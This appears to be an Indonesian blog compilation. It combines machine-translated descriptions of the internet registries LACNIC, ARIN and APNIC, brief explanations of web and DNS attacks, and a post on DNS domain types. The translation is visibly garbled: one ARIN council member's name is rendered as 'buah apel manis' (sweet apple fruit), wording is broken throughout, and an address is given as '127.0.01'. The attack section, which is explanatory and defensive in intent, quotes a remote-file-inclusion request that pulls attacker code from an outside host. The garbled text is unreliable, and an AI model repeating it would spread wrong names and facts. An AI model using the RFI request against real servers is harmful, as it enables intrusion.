* LACNIC mencalonkan dan memilih anggota Badan Eksekutif. Dewan terdiri dari enam anggota dan bertanggung jawab untuk menunjuk Directo Eksekutif LACNIC dan untuk situasi keuangan secara keseluruhan LACNIC.
* LACNIC Staf
* Anggota staf melakukan kegiatan LACNIC, memberikan layanan kepada anggotanya dan memberikan dukungan administrasi bagi LACNIC.

Organisasi yang menerima alamat IP dari LACNIC secara otomatis langsung menjadi anggota. Menurut ukuran ruang alamat setiap organisasi mengelola, ada anggota yang berbeda kategori dan tingkatan. Keanggotaan terbuka untuk setiap orang atau organisasi yang berminat; ini berarti bahwa organisasi-organisasi yang tidak langsung menerima alamat IP dari LACNIC juga dapat mengajukan aplikasi keanggotaan.

Hal ini tidak perlu menjadi anggota LACNIC sebelum mengajukan permohonan untuk ruang alamat IP (atau sumber daya lainnya), juga tidak akan berbuat demikian memudahkan untuk mendapatkan mereka.

LACNIC perjanjian kerjasama

Sejak pembentukannya, LACNIC telah mengadopsi kebijakan kerjasama yang aktif berusaha untuk mengkonsolidasikan dirinya sebagai sebuah organisasi, untuk memperkuat keterlibatan dalam pertumbuhan dan pengembangan Internet di wilayah, dan untuk memenuhi tujuan utamanya manajemen sumber daya Internet untuk wilayah Latin Amerika dan Karibia.

Contoh dari hal ini adalah perjanjian yang ditandatangani awal dengan melakukan Gestor Comite Internet NIC Brasil dan Meksiko. Melalui perjanjian pertama adalah mungkin untuk memiliki infrastruktur teknis dan sumber daya manusia yang diperlukan untuk LACNIC pusat operasional di kota São Paulo selama dua tahun pertama keberadaannya. Dalam kasus perjanjian dengan NIC Meksiko, sangat mungkin untuk mengimplementasikan rencana pelatihan LACNIC dengan mengorbankan kata organisasi, melalui bahan dan persiapan penyelenggaraan pertemuan di berbagai negara dari kawasan kita.

Kedua perjanjian memiliki peran yang sangat penting dalam pencapaian LACNIC stabilitas dan kelangsungan hidup selama tahap-tahap awal.

Demikian pula, kami percaya bahwa dengan menghasilkan berbagai kesepakatan kerjasama dan kegiatan LACNIC dapat membuat kontribusi yang signifikan bagi penguatan lembaga serta pertumbuhan dan perkembangan komunitas internet di kawasan ini.

LACNIC's partisipasi dalam setiap perjanjian adalah bervariasi dan tergantung pada kemampuan yang tersedia di masing-masing kasus, tetapi maksudnya adalah selalu untuk melengkapi sumber daya dan tindakan setiap organisasi. Untuk alasan ini, dalam beberapa kasus berpartisipasi dengan menggunakan dana sendiri atau memperoleh dana dari luar daerah, dalam orang lain dengan memfasilitasi pelembagaan organisasi regional, mengintegrasikan dan co-organisasi yang berpartisipasi dalam forum dan aktivitas lainnya serta mendukung penelitian pada isu-isu strategis.

Jadi, meskipun tidak peran utamanya, LACNIC memberikan kontribusi untuk pertumbuhan dan evolusi komunitas Internet regional, meningkatkan kehadiran internasionalnya dan relevansi, mengakibatkan tingkat keterlibatan yang lebih besar dan berpengaruh pada definisi kebijakan dan pengelolaan sumber daya global di jaringan tingkat internasional.

* NIC-BR - LACNIC Perjanjian
* NIC-MX - LACNIC Perjanjian
* CLARA - LACNIC Perjanjian Kerjasama
* ECOM-LAC - LACNIC Perjanjian Kerjasama
* LACTLD - LACNIC Perjanjian Kerjasama
* ICA-IDRC - LACNIC Agreement (Frida Program)
* ISC - LACNIC Perjanjian (Proyek + RAICES)
* ORT University - LACNIC Perjanjian
* Universitas Republik (Fakultas Teknik) - Perjanjian LACNIC
* Exchange Program dengan RIR lain
* Dukungan dan Partisipasi di Daerah Acara dan Forum lain

The Number Resource Organization

Dengan RIR lain, LACNIC adalah anggota dari Number Resource Organization (NRO), yang ada untuk melindungi sumber daya nomor belum dialokasikan renang, untuk mempromosikan dan melindungi bottom-up proses pengembangan kebijakan, dan menjadi titik fokus input ke dalam sistem RIR.

American Registry for Internet Numbers (ARIN)

American Registry for Internet Numbers (ARIN) adalah Regional Internet Registry (RIR) untuk Kanada, Karibia dan banyak pulau-pulau Atlantik Utara, dan Amerika Serikat. ARIN mengelola nomor Internet distribusi sumber daya, termasuk IPv4 dan IPv6 ruang dan nomor AS. ARIN membuka pintunya untuk bisnis di 22 Desember 1997after menggabungkan pada tanggal 18 April 1997. ARIN adalah sebuah lembaga nirlaba di negara bagian Virginia, negara bagian AS. Hal ini bermarkas di wilayah tak berhubungan Fairfax County, Virginia, Washington Dulles International Airport dan dekat Chantilly.


ARIN adalah salah satu dari lima Regional Internet Registry (RIR) di dunia. Seperti RIR lainnya, ARIN:

* Memberikan layanan yang berkaitan dengan koordinasi teknis dan manajemen sumber daya nomor Internet
* Memfasilitasi pengembangan kebijakan oleh para anggota dan stakeholder
* Berpartisipasi dalam komunitas internet internasional
* Apakah nirlaba, organisasi berbasis masyarakat
* Apakah diperintah oleh dewan eksekutif dipilih oleh keanggotaannya


Sejarah

Organisasi ini dibentuk pada Desember 1997 untuk "menyediakan layanan registrasi IP sebagai independen, lembaga nirlaba." Sampai saat ini IP pendaftaran di wilayah ARIN dilakukan oleh suatu departemen dalam perusahaan Network Solutions, yang menyediakan staf awal dan infrastruktur komputer untuk ARIN.

Presiden pertama ARIN Kim Hubbard, dari tahun 1997 sampai tahun 2000. Kim digantikan oleh Raymond "Ray" Plzak sampai akhir 2008. Trustee John Curran adalah pejabat Presiden sampai 1 Juli tahun 2009 ketika ia mengambil peran CEO secara permanen. Ray Plzak tetap sebagai konsultan untuk organisasi.

Sampai akhir tahun 2002 itu disajikan Meksiko, Amerika Tengah, Amerika Selatan dan seluruh Karibia. LACNIC sekarang menangani bagian dari Karibia, Meksiko, Amerika Tengah, dan Amerika Selatan. Juga, Sub-Sahara Afrika merupakan bagian dari wilayahnya sampai April 2005, ketika AfriNIC secara resmi diakui oleh ICANN sebagai kelima Regional Internet Registry.


Layanan

ARIN menyediakan layanan yang berkaitan dengan koordinasi teknis dan manajemen sumber daya nomor Internet. Sifat layanan ini dijelaskan dalam pernyataan misi ARIN:

Menerapkan prinsip-prinsip pelayanan, ARIN, sebuah lembaga nirlaba, mengalokasikan sumber daya Protokol Internet; mengembangkan kebijakan berbasis konsensus dan memfasilitasi kemajuan Internet melalui informasi dan pendidikan penjangkauan.


Layanan ini dikelompokkan dalam tiga bidang: Pendaftaran, Organisasi, dan Kebijakan Pembangunan.

Pendaftaran Layanan

Pendaftaran Layanan berkaitan dengan koordinasi teknis dan pengelolaan inventarisasi sumber daya nomor Internet. Layanan meliputi:

* Alokasi alamat IPv4 dan penugasan
* Alamat IPv6 alokasi dan penugasan
* Nomor AS penugasan
* Direktori layanan termasuk:
o Registrasi informasi transaksi (WHOIS)
o Routing informasi (Internet Routing Registry)
* DNS (Reverse)

Untuk informasi tentang nomor internet meminta sumber daya dari ARIN, lihat https://www.arin.net/sumber daya/index.html. Bagian ini meliputi permintaan template, kebijakan distribusi khusus, dan panduan untuk meminta dan mengelola sumber daya nomor internet.

Organisasi Pelayanan

Layanan organisasi berkaitan dengan interaksi antara para stakeholder, ARIN anggota, dan ARIN. Layanan meliputi:

* Pemilihan
* Anggota rapat
* Informasi publikasi dan penyebarluasan
* Pendidikan dan pelatihan


Kebijakan Pengembangan Jasa

Jasa Pengembangan kebijakan memfasilitasi pengembangan kebijakan untuk koordinasi teknis dan manajemen sumber daya nomor Internet.

Semua kebijakan ARIN diatur oleh masyarakat. Setiap orang didorong untuk berpartisipasi dalam proses pengembangan kebijakan di pertemuan kebijakan publik dan pada Kebijakan Publik Mailing List (ppml@arin.net). The ARIN Dewan Pengawas kebijakan meratifikasi hanya setelah:

1. diskusi di milis, dan pada saat rapat;
2. Dewan Pertimbangan ARIN rekomendasi;
3. konsensus masyarakat yang mendukung kebijakan dan
4. hukum penuh dan fiskal review.

Masyarakat mengembangkan kebijakan dengan mengikuti Proses Pengembangan Kebijakan formal seperti diuraikan di https://www.arin.net/kebijakan/pdp.html. Kebijakan The Number Resource Manual, ARIN set lengkap kebijakan saat ini, tersedia di https:// www.arin.net/kebijakan/nrpm.html.

Keanggotaan tidak diperlukan untuk berpartisipasi dalam pengembangan kebijakan ARIN proses atau menerapkan sumber daya nomor Internet.

Layanan meliputi:

* Mempertahankan diskusi daftar e-mail
* Melakukan pertemuan kebijakan publik
* Penerbitan dokumen kebijakan

Struktur Organisasi

ARIN terdiri dari komunitas internet di dalam wilayah, para anggotanya, 7-anggota Dewan Pengawas, 15-anggota Dewan Penasehat, dan staf profesional di bawah 50. Dewan Pengawas dan Dewan Penasehat dipilih oleh anggota ARIN selama tiga tahun.

Dewan Pengawas

Keanggotaan yang ARIN memilih Dewan Pengawas (BOT), yang memiliki tanggung jawab utama untuk urusan bisnis dan keuangan ARIN kesehatan, dan mengelola operasi ARIN dengan cara yang sesuai dengan petunjuk yang diterima dari Dewan Pertimbangan dan tujuan yang ditetapkan oleh anggota registri . Bot bertanggung jawab untuk menentukan disposisi dari semua pendapatan yang diterima untuk memastikan semua layanan yang disediakan dalam cara yang adil. Bot meratifikasi proposal yang dihasilkan dari keanggotaan dan dikirimkan melalui Dewan Penasehat. Keputusan eksekutif dilaksanakan setelah disetujui oleh BOT.

BOT terdiri dari 7 anggota:

* Scott Bradner (Bendahara)
* John Curran (Presiden dan CEO)
* Timotius Denton
* Lee Howard (Sekretaris)
* Paul Vixie (Ketua)
* Bill Woodcock
* Vacant Position

Dewan Penasehat

Di samping BOT, ARIN memiliki Dewan Pertimbangan yang memberikan nasihat ARIN dan alokasi IP BOT pada kebijakan dan hal-hal terkait. Mengikuti prosedur di Internet Resource Proses Evaluasi Kebijakan, Dewan Penasehat depan kebijakan berbasis konsensus proposal kepada BOT untuk diratifikasi.

Dewan Penasehat terdiri dari 15 anggota yang dipilih:

* Dan Alexander
* Paul Andersen
* Cathy Aronson
* Marla Azinger
* Leo Bicknell
* Marc Crandall
* Bill Darte
* Owen DeLong
* David Farmer
* Stacy Hughes
* Scott Leibrand
* Lea Roberts
* Robert Seastrom
* Heather Schiller
* John buah apel manis (Ketua)

Negara-negara di wilayah layanan ARIN adalah:

* Anguilla
* Antarctica
* Antigua and Barbuda
* Bahamas
* Barbados
* Bermuda
* Bouvet Island (Norway)
* Canada
* Cayman Islands (UK)
* Dominica
* Grenada
* Guadeloupe (France)
* Heard and McDonald Islands (Australia)
* Jamaica
* Martinique (France)
* Montserrat
* Puerto Rico (U.S.)
* Saint Kitts and Nevis
* Saint Lucia
* Saint Vincent and the Grenadines
* St. Helena (UK)
* St. Pierre and Miquelon (France)
* Turks and Caicos Islands
* United States
* United States Minor Outlying Islands
* British Virgin Islands (UK)
* U.S. Virgin Islands (U.S.)

Asia-Pacific Network Information Centre (APNIC)

Asia Pacific Network Information Centre (APNIC) adalah Regional Internet Registry untuk kawasan Asia Pasifik.
APNIC menyediakan jumlah alokasi sumber daya dan layanan registrasi yang mendukung operasi global Internet. Ini adalah bukan untuk mencari keuntungan, organisasi berbasis keanggotaan yang anggotanya termasuk Internet Service Provider, Internet Registries Nasional, dan organisasi serupa.


APNIC fungsi utama adalah:

* Mengalokasikan IPv4 dan IPv6 address space, dan Autonomous System Numbers
* Memelihara Database Whois publik untuk wilayah Asia Pasifik
* Reverse DNS delegasi
* Mewakili kepentingan komunitas internet Asia Pasifik di panggung global


Pertemuan Kebijakan Terbuka

Setiap tahun, APNIC mengadakan dua pertemuan kebijakan terbuka. Ini memberikan kesempatan masyarakat untuk datang bersama-sama untuk pengembangan kebijakan, pengambilan keputusan, pendidikan, pertukaran informasi, dan jaringan - baik profesional dan sosial. Kebijakan Terbuka pertama setiap tahun Rapat diselenggarakan sebagai jejak konferensi Asia Pacific Regional Internet Conference on Operational Technologies (APRICOT), dan yang kedua adalah sebagai standalone diadakan pertemuan. Pertemuan diadakan di berbagai lokasi di seluruh Asia Pasifik dan sering melibatkan unsur-unsur budaya ekonomi negara tuan rumah.



Pelatihan APNIC

APNIC mengadakan beberapa kursus pelatihan di berbagai lokasi di seluruh wilayah. Kursus-kursus ini dirancang untuk mendidik peserta untuk mahir mengkonfigurasi, mengelola dan memberikan layanan internet mereka dan infrastruktur dan untuk menerima praktek-praktek terbaik saat ini.

Whois database

Database Whois APNIC detail dari registrasi berisi alamat IP dan nomor AS awalnya dialokasikan oleh APNIC. Ini menunjukkan organisasi-organisasi yang memegang sumber daya, di mana alokasi dibuat, dan rincian kontak untuk jaringan. Organisasi yang memegang sumber daya yang bertanggung jawab untuk memperbarui informasi mereka dalam database. Basis data dapat dicari dengan menggunakan antarmuka web pada situs APNIC, atau dengan mengarahkan klien whois Anda whois.apnic.net (misalnya, whois-h whois.apnic.net 203.37.255.97).

Sejarah

APNIC didirikan pada tahun 1992 oleh Asia Pasifik Koordinator Komite Penelitian Intercontinental Networks (APCCIRN) dan Asia Pacific Engineering and Planning Group (APEPG). Kedua kelompok itu kemudian digabung dan berganti nama menjadi Kelompok Jaringan Asia Pasifik (APNG). Ini didirikan sebagai sebuah proyek percontohan untuk memberikan ruang alamat seperti yang didefinisikan oleh RFC-1366, dan juga mencakup singkat yang lebih luas: "Untuk memfasilitasi komunikasi, bisnis, dan budaya dengan menggunakan teknologi internet".

Pada tahun 1993, APNG menemukan mereka tidak mampu menyediakan payung formal atau struktur hukum untuk APNIC, dan jadi pilot proyek ini menyimpulkan, tetapi APNIC terus eksis secara independen di bawah kekuasaan IANA sebagai 'proyek sementara'. Pada tahap ini, APNIC masih tidak memiliki hak-hak hukum, keanggotaan, dan struktur biaya.

Pada tahun 1995, pelantikan diadakan pertemuan APNIC di Bangkok. Ini adalah pertemuan dua hari, dijalankan oleh para relawan, dan bebas untuk hadir. Sumbangan sukarela dicari sesuai dengan ukuran organisasi, mulai dari $ 1.500 untuk 'kecil', melalui ke $ 10.000 untuk 'besar'. Tiga anggota jenis didefinisikan oleh APNIC-001: ISP (lokal IR), Enterprise, dan Nasional.

1996 melihat struktur biaya yang layak diperkenalkan, pembentukan keanggotaan, dan penyelenggaraan pertemuan APRICOT pertama.

1997 Pada saat tiba, itu menjadi semakin jelas bahwa APNIC lingkungan setempat di Jepang membatasi pertumbuhan - misalnya, staf terbatas pada anggota 4-5. Oleh karena itu, perusahaan konsultan KPMG dikontrak untuk menemukan lokasi yang ideal di kawasan Asia Pasifik untuk APNIC markas baru.

Untuk alasan-alasan seperti infrastruktur stabil, rendahnya biaya hidup dan operasi, dan keuntungan pajak bagi organisasi keanggotaan, Brisbane, Australia dipilih sebagai lokasi baru, dan relokasi selesai antara bulan April dan Agustus, 1998, sambil tetap menjaga seluruh operasi terus-menerus.

Pada tahun 1999, relokasi itu selesai, krisis ekonomi Asia berakhir, maka mulai periode konsolidasi untuk APNIC - masa pertumbuhan berkelanjutan, pengembangan kebijakan, dan penciptaan dokumentasi dan sistem internal.

Sejak itu, APNIC telah terus tumbuh dari awal yang sederhana ke anggota lebih dari 1.500 di 56 ekonomi di seluruh wilayah dan sekretariat dari sekitar 50 anggota staf yang terletak di kantor pusat di Brisbane, Australia.


Proses pengembangan kebijakan

Kebijakan-kebijakan APNIC dikembangkan oleh keanggotaan dan lebih luas komunitas internet. Media besar untuk pengembangan kebijakan adalah face-to-face Pertemuan Kebijakan Terbuka, yang diadakan dua kali setiap tahun, dan milis diskusi.

Pengembangan kebijakan APNIC prosesnya adalah:

* Buka
* Siapa saja dapat mengusulkan kebijakan.
* Setiap orang dapat membicarakan proposal kebijakan.
* Transparan
* APNIC dokumen publik semua diskusi kebijakan dan keputusan.
* Bottom-up
* drive komunitas pengembangan kebijakan.

Dokumen APNIC semua diskusi kebijakan dan keputusan untuk memberikan transparansi lengkap dari proses pengembangan kebijakan.

APNIC mewakili kawasan Asia Pasifik, yang terdiri dari 56 ekonomi:

* Afghanistan
* Samoa Amerika (US)
* Australia
* Bangladesh
* Bhutan
* British Indian Ocean Territory (UK)
* Brunei Darussalam
* Kamboja
* People's Republic of China
* Christmas Island (AU)
* Kepulauan Cocos (Keeling) Kepulauan (AU)
* Kepulauan Cook (N.Z.)
* Timor Timur
* Fiji
* Polinesia Perancis (Perancis)
* Wilayah Prancis Selatan (Perancis)
* Guam (US)
* Hong Kong (RRC)
* India
* Indonesia
* Jepang
* Kiribati
* Korea Utara
* Korea Selatan
* Laos
* Makau (RRC)
* Malaysia
* Maladewa
* Kepulauan Marshall
* Mikronesia
* Mongolia
* Myanmar (Burma)
* Nauru
* Nepal
* Kaledonia Baru (Perancis)
* Selandia Baru
* Niue (N.Z.)
* Pulau Norfolk (AU)
* Kepulauan Mariana Utara (US)
* Pakistan
* Palau
* Papua Nugini
* Filipina
* Pitcairn (Inggris)
* Samoa
* Singapura
* Solomon
* Sri Lanka
* Taiwan
* Thailand
* Tokelau (N.Z.)
* Tonga
* Tuvalu
* Vanuatu
* Vietnam
* Kepulauan Wallis dan Futuna (Perancis)
APNIC tertutup Madagaskar, Mauritius dan Seychelles sampai AfriNIC terbentuk.

5 Badan Pengatur DNS di dunia

Remote File Inclusion (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi.

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos.


Hal yang bisa dilakukan untuk menghindari dari serangan ini adalah :


Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

DNS Cache Poisoning

DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.
DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut. Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu.

Buffer Overflows

Beberapa serangan umum Buffer overflow, diantaranya:

a. Buffer overruns pada kebanyakan Web server
Webserver Apache dan IIS memiliki celah keamanan. Worm seperti Code Red (untuk IIS) dan Linux. Slapper (untuk Apache) menjadikan celah keamanan yang lebar.

b. DNS overflow
Beberapa server DNS (BIND) sebelumnya tergolong rentan terhadap overflow. Suatu serangan yang akan memberikan nama DNS sangat panjang. Nama DNS dibatasi hingga 64-byte per subkomponen dan 256 byte secara keseluruhan.

c. Serangan DNS
Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker.

d. Mengelabui cache DNS
Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″).

IP spoofing

IP spoofing adalah sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya. Kemampuan ini sering dimanfaatkan oleh para hacker untuk melancarkan serangan seperti:

a. SMURF Attack
Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service.

b. Prediksi jumlah rangkaian TCP
Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP.

c. Prediksi rangkaian melalui pemalsuan DNS
Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker.

Monday, February 21, 2011

Macam-macam Tree domain

Generic Domain

Domain generik mendefinisikan host terdaftar sesuai dengan perilaku generik mereka. Setiap simpul di pohon mendefinisikan suatu domain, yang merupakan indeks untuk nama ruang database domain seperti di Gbr.6. Tingkat pertama di bagian domain generik memungkinkan tujuh label tiga-karakter yang menggambarkan jenis organisasi seperti terlihat pada tabel 1. Baru-baru ini beberapa tingkat pertama-label telah dietujui.



Country Domain


Negara bagian menggunakan domain-karakter negara singkatan dua (misalnya, iq untuk Irak).


Invers Domain
domain invers digunakan untuk memetakan sebuah alamat ke nama.

Parsial Qualifed Domain Name (PQDN)

Jika label tidak diakhiri dengan string null, disebut nama domain berkualifikasi parsial (PQDN),. A PQDN mulai dari node tapi tidak mencapai akar. Hal ini digunakan ketika nama harus diselesaikan termasuk dalam situs yang sama sebagai klien. Berikut resolver bisa menyediakan bagian yang hilang, yang disebut akhiran, untuk menciptakan sebuah FQDN.

Misalnya, jika pengguna di fhda.edu tersebut. Situs ingin mendapatkan alamat IP dari komputer penantang, ia dapat mendefinisikan nama parsial Challenger

Klien DNS atc.fhda.edu menambahkan akhiran. Sebelum melewati alamat untuk server DNS. Klien DNS biasanya memegang daftar akhiran. Berikut dapat beberapa dari daftar sufiks di De Anza College.

FQDN (Fully Qualifed Domain Name)

Fully Qualifed Domain Name (disingkat menjadi FQDN), dalam sistem penamaan domain Domain Name System (DNS) merujuk kepada nama bertitik yang dapat mengidentifikasikan sebuah host Transmission Control Protocol/Internet Protocol (TCP/IP) di dalam jaringan dan Internet. FQDN juga sering disebut sebagai Absolute Domain Name. FQDN didiskusikan dalam RFC 1035, RFC 1123 dan RFC 2181.

Sebuah FQDN dari sebuah host mengandung nama host miliknya digabungkan dengan nama domain (dan subdomain) di mana host tersebut berada, yang kemudian dipisahkan dengan menggunakan tanda titik (.). FQDN umumnya digunakan di dalam Uniform Resource Locator (URL) yang digunakan untuk mengakses halaman web di dalam jaringan dan Internet dan membuat path absolut terhadap ruang nama (namespace) DNS ke host target di mana halaman web tersebut berada. FQDN berbeda dengan nama domain biasa karena FQDN merupakan nama absolut dari domain, sehingga sufiks domain tidak perlu ditambahkan.

Contoh FQDN: untuk sebuah nama FQDN id.wikipedia.org, dapat diambil pernyataan bahwa id merupakan nama host, dan wikipedia.org merupakan nama domain-nya. Panjang maksimum dari FQDN adalah 255 bita.